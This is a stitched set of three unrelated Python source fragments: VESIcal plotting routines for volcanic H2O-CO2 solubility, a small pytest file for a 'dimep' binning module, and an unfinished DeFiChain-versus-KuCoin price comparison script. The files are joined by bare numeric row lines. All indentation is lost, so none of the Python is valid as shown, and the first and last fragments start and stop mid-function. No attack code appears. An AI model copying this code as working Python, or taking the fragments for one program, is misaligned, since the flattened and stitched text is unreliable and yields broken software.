# calcualte polynomial
Pz = np.polyfit(Pxs, Pys, 3)
Pf = np.poly1d(Pz)
# calculate new x's and y's
Px_new = np.linspace(Pxs[0], Pxs[-1], 50)
Py_new = Pf(Px_new)
# Save x's and y's
Px_new_list = list(Px_new)
isobars_H2O_liq += Px_new_list
Py_new_list = list(Py_new)
isobars_CO2_liq += Py_new_list
pressure_vals_for_list = [pressure]*len(Px_new)
isobars_pressure += pressure_vals_for_list
except Exception:
Px_list = list(Pxs)
isobars_H2O_liq += Px_list
Py_list = list(Pys)
isobars_CO2_liq += Py_list
pressure_vals_for_list = [pressure]*len(Pxs)
isobars_pressure += pressure_vals_for_list
isobar_df = pd.DataFrame({"Pressure": isobars_pressure,
"H2O_liq": isobars_H2O_liq,
"CO2_liq": isobars_CO2_liq})
if isopleths is not None:
XH2O_vals = isopleths.XH2O_fl.unique()
isopleths_lists = isopleths.values.tolist()
isopleths_XH2O_fl = []
isopleths_H2O_liq = []
isopleths_CO2_liq = []
for Xfl in XH2O_vals:
Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl]
Xys = [item[2] for item in isopleths_lists if item[0] == Xfl]
try:
# calculate polynomial
Xz = np.polyfit(Xxs, Xys, 2)
Xf = np.poly1d(Xz)
# calculate new x's and y's
Xx_new = np.linspace(Xxs[0], Xxs[-1], 50)
Xy_new = Xf(Xx_new)
# Save x's and y's
Xx_new_list = list(Xx_new)
isopleths_H2O_liq += Xx_new_list
Xy_new_list = list(Xy_new)
isopleths_CO2_liq += Xy_new_list
XH2Ofl_vals_for_list = [Xfl]*len(Xx_new)
isopleths_XH2O_fl += XH2Ofl_vals_for_list
except Exception:
Xx_list = list(Xxs)
isopleths_H2O_liq += Xx_list
Xy_list = list(Xys)
isopleths_CO2_liq += Xy_list
XH2Ofl_vals_for_list = [Xfl]*len(Xxs)
isopleths_XH2O_fl += XH2Ofl_vals_for_list
isopleth_df = pd.DataFrame({"XH2O_fl": isopleths_XH2O_fl,
"H2O_liq": isopleths_H2O_liq,
"CO2_liq": isopleths_CO2_liq})
np.seterr(divide='warn', invalid='warn') # turn numpy warning back on
w.filterwarnings("always", message="Polyfit may be poorly conditioned")
if isobars is not None:
if isopleths is not None:
return isobar_df, isopleth_df
else:
return isobar_df
else:
if isopleths is not None:
return isopleth_df
def plot(isobars=None, isopleths=None, degassing_paths=None, custom_H2O=None,
custom_CO2=None, isobar_labels=None, isopleth_labels=None,
degassing_path_labels=None, custom_labels=None,
custom_colors="VESIcal", custom_symbols=None, markersize=10,
figsize=(12, 8), save_fig=False, extend_isobars_to_zero=True,
smooth_isobars=False, smooth_isopleths=False, **kwargs):
"""
Custom automatic plotting of model calculations in VESIcal.
Isobars, isopleths, and degassing paths can be plotted. Labels can be
specified for each. Any combination of isobars, isopleths, and degassing
paths can be plotted.
Parameters
----------
isobars: pandas DataFrame or list
OPTIONAL. DataFrame object containing isobar information as calculated
by calculate_isobars_and_isopleths. Or a list of DataFrame objects.
isopleths: pandas DataFrame or list
OPTIONAL. DataFrame object containing isopleth information as
calculated by calculate_isobars_and_isopleths. Or a list of DataFrame
objects.
degassing_paths: list
OPTIONAL. List of DataFrames with degassing information as generated
by calculate_degassing_path().
custom_H2O: list
OPTIONAL. List of groups of H2O values to plot as points. For example
myfile.data['H2O'] is one group of H2O values. Must be passed with
custom_CO2 and must be same length as custom_CO2.
custom_CO2: list
OPTIONAL. List of groups of CO2 values to plot as points.For example
myfile.data['CO2'] is one group of CO2 values. Must be passed with
custom_H2O and must be same length as custom_H2O.
isobar_labels: list
OPTIONAL. Labels for the plot legend. Default is None, in which case
each plotted line will be given the generic legend name of
"Isobars n", with n referring to the nth isobars passed. Isobar
pressure is given in parentheses. The user can pass their own labels
as a list of strings. If more than one set of isobars is passed, the
labels should refer to each set of isobars, not each pressure.
isopleth_labels: list
OPTIONAL. Labels for the plot legend. Default is None, in which case
each plotted isopleth will be given the generic legend name of
"Isopleth n", with n referring to the nth isopleths passed. Isopleth
XH2O values are given in parentheses. The user can pass their own
labels as a list of strings. If more than one set of isopleths is
passed, the labels should refer to each set of isopleths, not each
XH2O value.
degassing_path_labels: list
OPTIONAL. Labels for the plot legend. Default is None, in which case
each plotted line will be given the generic legend name of "Pathn",
with n referring to the nth degassing path passed. The user can pass
their own labels as a list of strings.
custom_labels: list
OPTIONAL. Labels for the plot legend. Default is None, in which case
each group of custom points will be given the generic legend name of
"Customn", with n referring to the nth degassing path passed. The user
can pass their own labels as a list of strings.
custom_colors: list
OPTIONAL. Default value is "VESIcal", which uses VESIcal's color ramp.
A list of color values readable by matplotlib can be passed here if
custom symbol colors are desired. The length of this list must match
that of custom_H2O and custom_CO2.
custom_symbols: list
OPTIONAL. Default value is None, in which case data are plotted as
filled circles.. A list of symbol tyles readable by matplotlib can be
passed here if custom symbol types are desired. The length of this
list must match that of custom_H2O and custom_CO2.
markersize: int
OPTIONAL. Default value is 10. Same as markersize kwarg in matplotlib.
Any numeric value passed here will set the marker size for
(custom_H2O, custom_CO2) points.
figsize: tuple
OPTIONAL. Default value is (12,8). Sets the matplotlib.pyplot figsize
value as (x_dimension, y_dimension)
save_fig: False or str
OPTIONAL. Default value is False, in which case the figure will not be
saved. If a string is passed, the figure will be saved with the string
as the filename. The string must include the file extension.
extend_isobars_to_zero: bool
OPTIONAL. If True (default), isobars will be extended to zero, even if
there is a finite solubility at zero partial pressure.
smooth_isobars: bool
OPTIONAL. Default is False. If set to True, isobar data will be fit to
a polynomial and plotted. If False, the raw input data will be plotted.
smooth_isopleths: bool
OPTIONAL. Default is False. If set to True, isopleth data will be fit
to a polynomial and plotted. If False, the raw input data will be
plotted.
Returns
-------
fig, axes Matplotlib objects
fig and axes matploblib objects defining a plot with x-axis as H2O wt%
in the melt and y-axis as CO2 wt%in the melt. Isobars, or lines of
constant pressure at which the sample magma composition is saturated,
and isopleths, or lines of constant fluid composition at which the
sample magma composition is saturated, are plotted if passed.
Degassing paths, or the concentration of dissolved H2O and CO2 in a
melt equilibrated along a path of decreasing pressure, is plotted if
passed.
"""
# Turn off warnings:
np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning
w.filterwarnings("ignore", message="Polyfit may be poorly conditioned")
def check_inputs(custom_H2O, custom_CO2):
if custom_H2O is not None:
if custom_CO2 is None:
raise core.InputError("If x data is passed, y data must also "
"be passed.")
else:
if len(custom_H2O) == len(custom_CO2):
pass
else:
raise core.InputError("x and y data must be same length")
if custom_CO2 is not None:
if custom_H2O is None:
raise core.InputError("If y data is passed, x data must also "
"be passed.")
def check_colors(custom_colors):
if custom_colors == "VESIcal":
use_colors = color_list
elif isinstance(custom_colors, list):
use_colors = custom_colors
else:
raise core.InputError("Argument custom_colors must be type list. "
"Just passing one item? Try putting square "
"brackets, [], around it.")
return use_colors
def calc_extend_isobars_to_zero(Pxs, Pys):
"""
Calculates new end-points for plotting isobars when
extend_isobars_to_zero option is set to True.
Parameters
----------
Pxs, Pys: list
List of x and y values corresponding to isobars.
"""
if Pxs[0]*Pys[0] != 0.0:
if Pxs[0] > Pys[0]:
# create new array of length n+1 if n is the length of the
# original array:
Px_new = np.zeros(np.shape(Pxs)[0]+1)
# set the first x value in the new array equal to 0:
Px_new[0] = 0
# fill the rest of the new array with the original array
# values:
Px_new[1:] = Pxs
# overwrite the original array with the new one:
Pxs = Px_new
Py_new = np.zeros(np.shape(Pys)[0]+1)
Py_new[0] = Pys[0]
Py_new[1:] = Pys
Pys = Py_new
else:
Px_new = np.zeros(np.shape(Pxs)[0]+1)
Px_new[0] = Pxs[0]
Px_new[1:] = Pxs
Pxs = Px_new
Py_new = np.zeros(np.shape(Pys)[0]+1)
Py_new[0] = 0
Py_new[1:] = Pys
Pys = Py_new
if Pxs[-1]*Pys[-1] != 0.0:
if Pxs[-1] < Pys[-1]:
Px_new = np.zeros(np.shape(Pxs)[0]+1)
Px_new[-1] = 0
Px_new[:-1] = Pxs
Pxs = Px_new
Py_new = np.zeros(np.shape(Pys)[0]+1)
Py_new[-1] = Pys[-1]
Py_new[:-1] = Pys
Pys = Py_new
else:
Px_new = np.zeros(np.shape(Pxs)[0]+1)
Px_new[-1] = Pxs[-1]
Px_new[:-1] = Pxs
Pxs = Px_new
Py_new = np.zeros(np.shape(Pys)[0]+1)
Py_new[-1] = 0
Py_new[:-1] = Pys
Pys = Py_new
return Pxs, Pys
# -------- HANDLE USER INPUT ERRORS, SET COLORS, SMOOTH LINES -------- ##
check_inputs(custom_H2O=custom_H2O, custom_CO2=custom_CO2)
use_colors = check_colors(custom_colors=custom_colors)
if smooth_isobars:
isobars = smooth_isobars_and_isopleths(isobars=isobars)
if smooth_isopleths:
isopleths = smooth_isobars_and_isopleths(isopleths=isopleths)
# -------- CREATE FIGURE -------- ##
fig, ax = plt.subplots(figsize=figsize)
if 'custom_x' in kwargs:
ax.set(xlabel=kwargs['xlabel'], ylabel=kwargs['ylabel'])
else:
ax.set(xlabel='H$_2$O wt%', ylabel='CO$_2$ wt%')
labels = []
# -------- PLOT ISOBARS -------- ##
if isobars is not None:
if isinstance(isobars, pd.DataFrame):
isobars = [isobars]
for i in range(len(isobars)):
P_vals = isobars[i].Pressure.unique()
isobars_lists = isobars[i].values.tolist()
# add zero values to volatiles list
isobars_lists.append([0.0, 0.0, 0.0, 0.0])
P_iter = 0
for pressure in P_vals:
P_iter += 1
Pxs = [item[1] for item in isobars_lists
if item[0] == pressure]
Pys = [item[2] for item in isobars_lists
if item[0] == pressure]
if extend_isobars_to_zero:
try:
Pxs, Pys = calc_extend_isobars_to_zero(Pxs, Pys)
except Exception:
pass
else:
print(extend_isobars_to_zero)
if len(isobars) > 1:
if P_iter == 1:
P_list = [int(i) for i in P_vals]
if isinstance(isobar_labels, list):
labels.append(str(isobar_labels[i]) + ' (' +
', '.join(map(str, P_list)) +
" bars)")
else:
labels.append('Isobars ' + str(i+1) + ' (' +
', '.join(map(str, P_list)) +
" bars)")
else:
labels.append('_nolegend_')
if len(isobars) > 1:
ax.plot(Pxs, Pys, color=color_list[i])
else:
ax.plot(Pxs, Pys)
if len(isobars) == 1:
labels += [str(P_val) + " bars" for P_val in P_vals]
# -------- PLOT ISOPLETHS -------- ##
if isopleths is not None:
if isinstance(isopleths, pd.DataFrame):
isopleths = [isopleths]
for i in range(len(isopleths)):
XH2O_vals = isopleths[i].XH2O_fl.unique()
isopleths_lists = isopleths[i].values.tolist()
H_iter = 0
for Xfl in XH2O_vals:
H_iter += 1
Xxs = [item[1] for item in isopleths_lists if item[0] == Xfl]
Xys = [item[2] for item in isopleths_lists if item[0] == Xfl]
if len(isopleths) > 1:
if H_iter == 1:
H_list = [i for i in XH2O_vals]
if isinstance(isopleth_labels, list):
labels.append(str(isopleth_labels[i]) + ' (' +
', '.join(map(str, H_list)) +
" XH2Ofluid)")
else:
labels.append('Isopleths ' + str(i+1) + ' (' +
', '.join(map(str, H_list)) +
" XH2Ofluid)")
else:
labels.append('_nolegend_')
ax.plot(Xxs, Xys, ls='dashed', color=color_list[i])
if len(isopleths) == 1:
H_list = [i for i in XH2O_vals]
if H_iter == 1:
labels.append('Isopleths (' +
', '.join(map(str, H_list)) +
" XH2Ofluid)")
else:
labels.append('_nolegend_')
ax.plot(Xxs, Xys, ls='dashed', color='k')
# -------- PLOT DEGASSING PATHS -------- ##
if degassing_paths is not None:
if isinstance(degassing_paths, pd.DataFrame):
degassing_paths = [degassing_paths]
degassing_colors = color_list.copy()
iterno = 0
for i in range(len(degassing_paths)):
if degassing_path_labels is None:
iterno += 1
labels.append('Path%s' % iterno)
ax.plot(degassing_paths[i]["H2O_liq"],
degassing_paths[i]["CO2_liq"], ls='dotted',
color=degassing_colors[i])
else:
labels.append(degassing_path_labels[iterno])
ax.plot(degassing_paths[i]["H2O_liq"],
degassing_paths[i]["CO2_liq"], ls='dotted',
color=degassing_colors[i])
iterno += 1
for i in range(len(degassing_paths)):
ax.plot(degassing_paths[i]["H2O_liq"].max(),
degassing_paths[i]["CO2_liq"].max(), 'o',
color=degassing_colors[i])
labels.append('_nolegend_')
# -------- PLOT CUSTOM H2O-CO2 -------- ##
if custom_H2O is not None and custom_CO2 is not None:
if isinstance(custom_H2O, pd.DataFrame):
custom_H2O = [custom_H2O]
if isinstance(custom_CO2, pd.DataFrame):
custom_CO2 = [custom_CO2]
if custom_symbols is None:
use_marker = ['o'] * len(custom_H2O)
else:
use_marker = custom_symbols
iterno = 0
for i in range(len(custom_H2O)):
if custom_labels is None:
iterno += 1
labels.append('Custom%s' % iterno)
ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i],
color=use_colors[i], markersize=markersize)
else:
labels.append(custom_labels[iterno])
ax.plot(custom_H2O[i], custom_CO2[i], use_marker[i],
color=use_colors[i], markersize=markersize)
iterno += 1
# -------- PLOT CUSTOM X-Y -------- ##
if 'custom_x' in kwargs:
custom_x = kwargs['custom_x']
custom_y = kwargs['custom_y']
if isinstance(custom_x, pd.core.series.Series):
custom_x = [list(custom_x.values)]
if isinstance(custom_y, pd.core.series.Series):
custom_y = [list(custom_y.values)]
if custom_symbols is None:
use_marker = ['o'] * len(custom_x)
else:
use_marker = custom_symbols
iterno = 0
for i in range(len(custom_x)):
if custom_labels is None:
iterno += 1
labels.append('Custom%s' % iterno)
ax.plot(custom_x[i], custom_y[i], use_marker[i],
color=use_colors[i], markersize=markersize)
else:
labels.append(custom_labels[iterno])
ax.plot(custom_x[i], custom_y[i], use_marker[i],
color=use_colors[i], markersize=markersize)
iterno += 1
# -------- PLOT LEGEND -------- ##
ax.legend(labels, bbox_to_anchor=(1.01, 1), loc='upper left')
if 'custom_x' not in kwargs:
ax.set_xlim(left=0)
ax.set_ylim(bottom=0)
np.seterr(divide='warn', invalid='warn') # turn numpy warning back on
w.filterwarnings("always", message="Polyfit may be poorly conditioned")
# -------- SAVE FIGURE IF DESIRED -------- ##
if save_fig is not False:
fig.savefig(save_fig)
return fig, ax
def scatterplot(custom_x, custom_y, xlabel=None, ylabel=None, **kwargs):
"""
Custom x-y plotting using VESIcal's built-in plot() function, built
Matplotlib's plot and scatter functions.
Parameters
----------
custom_x: list
List of groups of x-values to plot as points or lines
custom_y: list
List of groups of y-values to plot as points or lines
xlabel: str
OPTIONAL. What to display along the x-axis.
ylabel: str
OPTIONAL. What to display along the y-axis.
kwargs:
Can take in any key word agruments that can be passed to `plot()`.
Returns
-------
fig, ax matplotlib objects
X-y plot with custom x and y axis values and labels.
"""
if isinstance(custom_x, list) and isinstance(custom_y, list):
if len(custom_x) != len(custom_y):
raise core.InputError("X and y lists must be same length")
if xlabel is not None:
if isinstance(xlabel, str):
pass
else:
raise core.InputError("xlabel must be string")
if ylabel is not None:
if isinstance(ylabel, str):
pass
else:
raise core.InputError("ylabel must be string")
return plot(custom_x=custom_x, custom_y=custom_y, xlabel=xlabel,
ylabel=ylabel, **kwargs)
# ------- Define custom plotting tools for checking calibrations ------- #
def calib_plot(user_data=None, model='all', plot_type='TAS', zoom=None,
figsize=(17, 8), legend=True, save_fig=False, **kwargs):
"""
Plots user data and calibration set of any or all models on any x-y plot
or a total alkalis vs silica (TAS) diagram. TAS diagram boundaries
provided by tasplot python module, copyright John A Stevenson.
Parameters
----------
user_data: BatchFile object, Sample object, pandas DataFrame, pandas Series,
or dict.
OPTIONAL. Default value is None, in which case only the model
calibration set is plotted. User provided sample data describing the
oxide composition of one or more samples. Multiple samples can be
passed as an BatchFile object or pandas DataFrame. A single sample can
be passed as a pandas Series.
model: str or list
OPTIONAL. Default value is 'all', in which case all model calibration
datasets will be plotted. 'Mixed' can be used to plot all mixed fluid
models. String of the name of the model calibration dataset to plot
(e.g., 'Shishkina'). Multiple models can be plotted by passing them as
strings within a list (e.g., ['Shishkina', 'Dixon']).
plot_type: str
OPTIONAL. Default value is 'TAS', which returns a total alkali vs
silica (TAS) diagram. Any two oxides can be plotted as an x-y plot by
setting plot_type='xy' and specifying x- and y-axis oxides, e.g.,
x='SiO2', y='Al2O3'.
zoom: str or list
OPTIONAL. Default value is None in which case axes will be set to the
default of 35<x<100 wt% and 0<y<25 wt% for TAS type plots and the best
values to show the data for xy type plots. Can pass "user_data" to
plot the figure where the x and y axes are scaled down to zoom in and
only show the region surrounding the user_data. A list of tuples may
be passed to manually specify x and y limits. Pass in data as
[(x_min, x_max), (y_min, y_max)]. For example, the default limits here
would be passed in as [(35,100), (0,25)].
figsize: tuple
OPTIONAL. Default value is (17,8). Sets the matplotlib.pyplot figsize
value as (x_dimension, y_dimension).
legend: bool
OPTIONAL. Default value is True. Can be set to False in which case the
legend will not be displayed.
save_fig: False or str
OPTIONAL. Default value is False, in which case the figure will not be
saved. If a string is passed, the figure will be saved with the string
as the filename. The string must include the file extension.
Returns
-------
matplotlib object
"""
# Get x and y axis limits, if user passed them
if zoom is None:
user_xmin = 35
user_xmax = 100
user_ymin = 0
user_ymax = 25
elif zoom == 'user_data':
if isinstance(user_data, pd.DataFrame):
print("'user_data' type zoom for more than one sample is not ",
"implemented yet.")
user_xmin = 35
user_xmax = 100
user_ymin = 0
user_ymax = 25
elif (isinstance(user_data, pd.core.series.Series) or
isinstance(user_data, dict)):
user_xmin = user_data['SiO2'] - 5
user_xmax = user_data['SiO2'] + 5
user_ymin = user_data['Na2O'] + user_data['K2O'] - 2
if user_ymin < 0:
user_ymin = 0
user_ymax = user_data['Na2O'] + user_data['K2O'] + 2
elif isinstance(zoom, list):
user_xmin, user_xmax = zoom[0]
user_ymin, user_ymax = zoom[1]
else:
raise core.InputError('Trying to pass zoom coords? Pass as ' +
'[(x, x), (y, y)]')
# Create the figure
fig, ax1 = plt.subplots(figsize=figsize)
font = {'family': 'sans-serif',
'color': 'black',
'weight': 'normal',
'size': 20,
}
# TAS figure
if plot_type == 'TAS':
# adjust x limits here if you want to focus on a specific part of
# compostional space:
ax1.set_xlim([user_xmin, user_xmax])
# adjust y limits here
ax1.set_ylim([user_ymin, user_ymax])
plt.xlabel('SiO$_2$, wt%', fontdict=font, labelpad=15)
plt.ylabel('Na$_2$O+K$_2$O, wt%', fontdict=font, labelpad=15)
# add LeMaitre fields
if zoom is None:
add_LeMaitre_fields(ax1)
elif plot_type == 'xy':
if 'x' in kwargs and 'y' in kwargs:
x = kwargs['x']
y = kwargs['y']
if zoom is not None:
ax1.set_xlim([user_xmin, user_xmax])
ax1.set_ylim([user_ymin, user_ymax])
plt.xlabel(str(x)+", wt%", fontdict=font, labelpad=15)
plt.ylabel(str(y)+", wt%", fontdict=font, labelpad=15)
else:
raise core.InputError("If plot_type is 'xy', then x and y "
"values must be passed as strings. For "
"example, x='SiO2', y='Al2O3'.")
# Plot Calibration Data
if model == 'all':
model = ['MagmaSat',
'Shishkina',
'Dixon',
'IaconoMarziano',
'Liu',
'AllisonCarbon',
'MooreWater']
if model == 'mixed':
model = ['MagmaSat',
'Shishkina',
'Dixon',
'IaconoMarziano',
'Liu']
if isinstance(model, str):
model = [model]
if isinstance(model, list):
# set legends to false
h2o_legend = False
co2_h2oco2_legend = False
# check which legends to turn to True
for modelname in model:
model_type = calibrations.return_calibration_type(modelname)
if model_type['H2O']:
h2o_legend = True
if model_type['CO2'] or model_type['Mixed']:
co2_h2oco2_legend = True
if h2o_legend:
plt.scatter([], [], marker='', label=r"$\bf{Pure \ H_2O:}$")
for modelname in model:
calibdata = calibrations.return_calibration(modelname)
model_type = calibrations.return_calibration_type(modelname)
if isinstance(calibdata, str):
w.warn(calibdata)
else:
if model_type['H2O']:
if plot_type == 'TAS':
try:
plt.scatter(calibdata['H2O']['SiO2'],
(calibdata['H2O']['Na2O'] +
calibdata['H2O']['K2O']),
marker='s', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
plt.scatter(calibdata['H2O']['SiO2'],
calibdata['H2O']['Na2O+K2O'],
marker='s', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
if plot_type == 'xy':
try:
plt.scatter(calibdata['H2O'][x],
calibdata['H2O'][y],
marker='s', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
w.warn("The requested oxides were not found",
"in the calibration dataset for " +
str(modelname) + ".")
if co2_h2oco2_legend:
plt.scatter([], [], marker='', label=r"${\ }$")
if co2_h2oco2_legend:
plt.scatter([], [], marker='',
label=r"$\bf{\ CO_2 \ and \ H_2O\!-\!CO_2:}$")
for modelname in model:
calibdata = calibrations.return_calibration(modelname)
model_type = calibrations.return_calibration_type(modelname)
if isinstance(calibdata, str):
w.warn(calibdata)
else:
if model_type['CO2'] and model_type['Mixed']:
frames = [calibdata['CO2'], calibdata['Mixed']]
co2_and_mixed = pd.concat(frames)
if plot_type == 'TAS':
try:
plt.scatter(co2_and_mixed['SiO2'],
(co2_and_mixed['Na2O'] +
co2_and_mixed['K2O']),
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
plt.scatter(co2_and_mixed['SiO2'],
co2_and_mixed['Na2O+K2O'],
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
if plot_type == 'xy':
try:
plt.scatter(co2_and_mixed[x], co2_and_mixed[y],
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
w.warn("The requested oxides were not found in ",
"the calibration dataset for " +
str(modelname) + ".")
elif model_type['CO2'] or model_type['Mixed']:
if model_type['CO2']:
thistype = 'CO2'
if model_type['Mixed']:
thistype = 'Mixed'
if plot_type == 'TAS':
try:
plt.scatter(calibdata[thistype]['SiO2'],
(calibdata[thistype]['Na2O'] +
calibdata[thistype]['K2O']),
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
plt.scatter(calibdata[thistype]['SiO2'],
calibdata[thistype]['Na2O+K2O'],
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
if plot_type == 'xy':
try:
plt.scatter(calibdata[thistype][x],
calibdata[thistype][y],
marker='d', edgecolors='k',
facecolors=calibdata['facecolor'],
label=str(modelname))
except Exception:
w.warn("The requested oxides were not found in ",
"the calibration dataset for "
+ str(modelname) + ".")
else:
raise core.InputError("model must be of type str or list")
# Plot user data
if user_data is None:
pass
else:
if ((user_data.__class__.__module__, user_data.__class__.__name__) ==
('VESIcal', 'BatchFile')):
user_data = user_data.get_data()
# batchfile and VESIcal (__init__) are not imported to avoid
# circular imports
# use above notation to interrogate datatype
if ((user_data.__class__.__module__, user_data.__class__.__name__) ==
('VESIcal', 'Sample')):
user_data = user_data.get_composition()
# batchfile and VESIcal (__init__) are not imported to avoid
# circular imports
# use above notation to interrogate datatype
if plot_type == 'TAS':
_sample = user_data.copy()
try:
_sample["TotalAlkalis"] = _sample["Na2O"] + _sample["K2O"]
except Exception:
core.InputError("Na2O and K2O data must be in user_data")
plt.scatter(_sample['SiO2'], _sample['TotalAlkalis'],
s=150, edgecolors='w', facecolors='red', marker='P',
label='User Data')
if plot_type == 'xy':
_sample = user_data.copy()
plt.scatter(_sample[x], _sample[y],
s=150, edgecolors='w', facecolors='red', marker='P',
label='User Data')
if legend:
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
fig.tight_layout()
if isinstance(save_fig, str):
fig.savefig(save_fig)
return fig, ax1
def show():
"""
Local implementation of pyplot.show(). For displaying created plots.
"""
plt.show()
| 37,815 | 11,372 |
from dimep.tools import *
import numpy as np
import pytest
@pytest.mark.parametrize("binsize", np.arange(1.0, 20.0, 1.0))
def test_downbin(binsize):
x = np.arange(0.0, 100.0, 1)
if binsize == 1.0:
xhat = x
else:
xhat = np.arange((binsize - 1) / 2, 100.0 - binsize / 2, binsize)
assert np.allclose(down_bin(x, int(binsize)), xhat)
def test_bwboundaries():
assert np.allclose(bw_boundaries([0, 1, 1, 0]), [0, 1, 1, 0])
assert np.allclose(bw_boundaries([0, 1, 1, 0, 1]), [0, 1, 1, 0, 2])
assert np.allclose(bw_boundaries([1, 1, 1, 0, 1]), [1, 1, 1, 0, 2])
assert np.allclose(bw_boundaries([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1])
assert np.allclose(bw_boundaries([1, 1, 0, 0, 1]), [1, 1, 0, 0, 2])
assert np.allclose(bw_boundaries([1, 1, 0, 1, 0, 1]), [1, 1, 0, 2, 0, 3])
| 824 | 445 |
import cexdatacollect
import dfi_dex_prices
from symbols import CryptoExchangeSymbols
class SymbolPrice():
def __init__(self, exchange_name:str, symbol:str, price:float):
self.exchange_name: str = exchange_name
self.symbol: str = symbol
self.price: float = price
class IndirectComparison():
def __init__(self, ex_name: str, cex_dfi_pair: SymbolPrice, dex_dfi_pair: SymbolPrice, intermediate_pair: SymbolPrice=None, percentage_minus_one :bool = True):
self.ex_name: str = ex_name
self.dex_dfi_pair = dex_dfi_pair
self.cex_dfi_pair = cex_dfi_pair
self.intermediate_pair = intermediate_pair
if intermediate_pair is None:
perc = (dex_dfi_pair.price/cex_dfi_pair.price)
if percentage_minus_one:
perc = perc -1
self.percentage: float = perc
else:
print(f"{dex_dfi_pair.symbol} = {dex_dfi_pair.price}, {intermediate_pair.symbol} = {intermediate_pair.price}, {cex_dfi_pair.symbol} = {cex_dfi_pair.price}")
perc = (dex_dfi_pair.price/(cex_dfi_pair.price/intermediate_pair.price))
if percentage_minus_one:
perc = perc -1
self.percentage: float = perc
class AggregatedComparison():
def __init__(self, cex_name: str, symbol, cex_price, dex_price):
self.cex_name: str = cex_name
self.symbol: CryptoExchangeSymbols = symbol
self.cex_price: float = cex_price
self.dex_price: float = dex_price
self.percentage: float = (dex_price/cex_price)-1
class CryptoComparison():
all_pairs = []
def __init__(self, dex_data: dfi_dex_prices.DfiDexPrices, cex_data: cexdatacollect.CexPriceFetch):
self.dex_data = dex_data
self.cex_data = cex_data
def get_indirect_comparison(self, dfi_symbol: CryptoExchangeSymbols, intermediate_symbol: CryptoExchangeSymbols = None, inverse_intermediate_symbol: bool = False, inverse_cex_dfi_price: bool = True):
exchange_name = 'KuCoin'
dex_dfi_price = float(self.dex_data.dex_crypto_state_map[dfi_symbol.d_token()].data.price_ratio.ba)
if intermediate_symbol is not None:
intermediate_price = 1/float(self.cex_data.cex_price_state[exchange_name][intermediate_symbol.value]['last'])
if inverse_intermediate_symbol:
new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[0]}"
inverse_intermediate_symbol = f"{intermediate_symbol.value.split('/')[1]}/{intermediate_symbol.value.split('/')[0]}"
intermediate_pair = SymbolPrice(exchange_name, inverse_intermediate_symbol, intermediate_price)
else:
new_cex_symbol = f"DFI/{intermediate_symbol.value.split('/')[1]}"
intermediate_pair = SymbolPrice(exchange_name, intermediate_symbol.value, intermediate_price)
cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][new_cex_symbol]['last'])
if inverse_cex_dfi_price:
cex_dfi_price = 1 / cex_dfi_price
cex_dfi_pair = SymbolPrice(exchange_name, new_cex_symbol, cex_dfi_price)
else:
intermediate_pair = None
cex_dfi_price = float(self.cex_data.cex_price_state[exchange_name][dfi_symbol.value]['last'])
if inverse_cex_dfi_price:
cex_dfi_price = 1 / cex_dfi_price
cex_dfi_pair = SymbolPrice(exchange_name, dfi_symbol.value, cex_dfi_price)
return IndirectComparison(
ex_name=exchange_name,
cex_dfi_pair=cex_dfi_pair,
dex_dfi_pair=SymbolPrice('dex', dfi_symbol.value, dex_dfi_price),
intermediate_pair=intermediate_pair,
percentage_minus_one=inverse_cex_dfi_price
)
def get_all_comparisons(self) -> [SymbolPrice]:
return [
self.get_indirect_comparison(CryptoExchangeSymbols.DFIBTC, None),
self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDT, None),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIETH, [CryptoExchangeSymbols.ETHBTC, CryptoExchangeSymbols.ETHUSDT]),
self.get_maximum_percentage(CryptoExchangeSymbols.DFILTC, [CryptoExchangeSymbols.LTCBTC, CryptoExchangeSymbols.LTCUSDT]),
#Something is wrong here!
#self.get_indirect_comparison(ExchangeSymbol.DFIUSDC, ExchangeSymbol.BTCUSDC, True, False),
self.get_indirect_comparison(CryptoExchangeSymbols.DFIUSDC, CryptoExchangeSymbols.USDTUSDC, True),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIBCH, [CryptoExchangeSymbols.BCHBTC, CryptoExchangeSymbols.BCHUSDT]),
self.get_maximum_percentage(CryptoExchangeSymbols.DFIDOGE, [CryptoExchangeSymbols.DOGEBTC, CryptoExchangeSymbols.DOGEUSDT]),
]
def get_maximum_percentage(self, dfi_symbol: CryptoExchangeSymbols, intermediate_pairs: [CryptoExchangeSymbols]):
all_paths = []
percentages = []
for pair in intermediate_pairs:
path = self.get_indirect_comparison(dfi_symbol, pair)
all_paths.append(path)
percentages.append(abs(path.percentage))
index_of_highest_percentage = percentages.index(max(percentages))
return all_paths[index_of_highest_percentage]
def update_pairs(self):
self.all_pairs = self.get_all_comparisons()
def get_overview(self):
pairs: [SymbolPrice] = self.get_all_comparisons()
pair_text = []
for pair in sorted(pairs, key=lambda x: abs(x.percentage), reverse=True):
if pair.intermediate_pair is None:
text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name}:\t{round(pair.cex_dfi_pair.price, 3)} DFI
\t{round(pair.percentage*100, 2)} %
"""
else:
text = f"""
DFI -> {pair.dex_dfi_pair.symbol.split('/')[1]}:
DEX:\t{round(pair.dex_dfi_pair.price, 3)} DFI
{pair.ex_name} via {pair.intermediate_pair.symbol.split('/')[1]}:\t{round(pair.cex_dfi_pair.price / pair.intermediate_pair.price, 3)} DFI
\t{round(pair.percentage * 100, 2)} %
"""
pair_text.append(text)
